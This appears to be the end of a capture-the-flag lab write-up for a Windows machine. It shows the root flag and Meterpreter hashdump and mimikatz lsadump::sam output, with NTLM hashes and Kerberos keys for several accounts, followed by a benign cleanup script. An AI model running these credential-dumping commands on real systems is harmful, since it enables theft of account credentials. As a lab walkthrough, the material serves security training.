|   |   Bing.url
|   |
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|
+---Music
|       cleanup.ps1

Root.txt

C:\Users\Administrator>type Desktop\root.txt
82d6553d01858c85ccdfff1fce9f9156

---

etc

Hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd lsadump::sam
Domain : COMPILED
SysKey : ef9684d8a57e7877b9db904fe9bb3f87
Local SID : S-1-5-21-4093338461-994521390-3704224775

SAMKey : 565c2b9d0fa08697947f0ec82936a0b6

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: f75c95bc9312632edec46b607938061e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : a8bdb4de233fcc523de7c295b60aa630

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-R3UQMMNAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a46bc71c88814b77b54e2fea7028627b2dec86fd436880ced2c3f68b128e5f3
      aes128_hmac       (4096) : 904b3f567dd64033cab936670abee6d2
      des_cbc_md5       (4096) : 89aef29b2f52e5ab

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-R3UQMMNAdministrator
    Credentials
      des_cbc_md5       : 89aef29b2f52e5ab


RID  : 000001f5 (501)
User : Invitado

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: ac8352a8680463c78247b75a023999cc

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 3569d5e4165ccf6c8066d4c98cd47a4c

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d3f4619d50309b281e0af3859e8bd0de75b3a839d2f4289a5ab00757f3e39baf
      aes128_hmac       (4096) : d5c3fbaf968f31fda4c124b9e33f079b
      des_cbc_md5       (4096) : 2a769d20a1382f1f

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 2a769d20a1382f1f


RID  : 000003e9 (1001)
User : Emily
  Hash NTLM: 259745cb123a52aa2e693aaacca2db52

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 56146bf0ea07641a2cb64c41a068f7c7

* Primary:Kerberos-Newer-Keys *
    Default Salt : COMPILEDEmily
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 2059000111e52df43201309b5cb744d0849aa8237877373e82784d510713591c
      aes128_hmac       (4096) : 1c225df0e8cb5fb0fd43eb31df913ff9
      des_cbc_md5       (4096) : 1f15a2a78c34260b
    OldCredentials
      aes256_hmac       (4096) : 069c47ebd45f1ce462cf62fb1a5a672bb25dd8b0cd1e06c9f9eb120cde444716
      aes128_hmac       (4096) : 8f92e5fd510ae35c043ea61e959b7506
      des_cbc_md5       (4096) : 80cdc1fe7ac24307
    OlderCredentials
      aes256_hmac       (4096) : 133fc63dfa50701e924171356cbb4ad1cd8674414b5a92f373915e74ca411938
      aes128_hmac       (4096) : 43a8e9710a1ad97dbdb07c500b186a79
      des_cbc_md5       (4096) : 02d59445e9165e52

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : COMPILEDEmily
    Credentials
      des_cbc_md5       : 1f15a2a78c34260b
    OldCredentials
      des_cbc_md5       : 80cdc1fe7ac24307


RID  : 000003ea (1002)
User : Richard
  Hash NTLM: f21635b4c33e9ed3ee47dd5b31ff0f92

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : d9810e30b14cf2a3db102859fc719ec1

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-R3UQMMNRichard
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : c16ad800abbf8d777814d4a44824985c8ee0e236b8128a21eb064869a2c141bd
      aes128_hmac       (4096) : ab8ac67135b2bf4e034b80f2bb5212b8
      des_cbc_md5       (4096) : 525e3db9adb0b358

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-R3UQMMNRichard
    Credentials
      des_cbc_md5       : 525e3db9adb0b358

Root scripts

PS C:\users\Administrator> cat Music/cleanup.ps1
function Check-Msiexec {
    Get-Process -Name msiexec -ErrorAction SilentlyContinue
}

while ($true) {
    $process = Check-Msiexec
    if ($process) {
        Write-Host "msiexec.exe process detected. Waiting for 15 seconds..."
        Start-Sleep -Seconds 15

        $process = Check-Msiexec
        if ($process) {
            Write-Host "15 seconds elapsed. Killing msiexec.exe process..."
            taskkill /f /im msiexec.exe
        }
    }
    Start-Sleep -Seconds 2
}